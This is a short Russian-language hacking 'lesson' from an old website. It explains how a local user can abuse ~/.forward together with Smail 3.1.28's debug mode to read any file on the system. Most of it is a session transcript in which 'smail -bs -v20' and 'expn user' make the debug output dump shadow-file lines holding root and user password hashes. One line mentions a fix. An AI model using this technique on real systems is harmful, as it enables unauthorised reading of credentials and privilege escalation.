2211
| ЗНАКОМСТВА | UKA.ru | Gossip.ru |Библиотека бесплатно! | massovka | vaticancitystate.ru | взрывЧАТка From 24.11.97
Lesson 007
----------

Цель: атака хоста через дырку #1 в sendmail.

Ошибка #1 (Sendmail Version 3.1.28)

Использование ~/.forward и отладки позволяет локальному пользователю прочитать 
любой файл системы. При добавлении -smtp_debup в smail config file эта ошибка
будет устранена. Она просто предотвращает атку через smtp порт. 

user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null), (null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15PDT
expn user
expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile:  opening forward file /home/user/.forward
read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::

[skipped]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection

PS. Thanx to Hacknet group

123123
| ЗНАКОМСТВА | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | взрывЧАТка From 24.11.97
uka.ru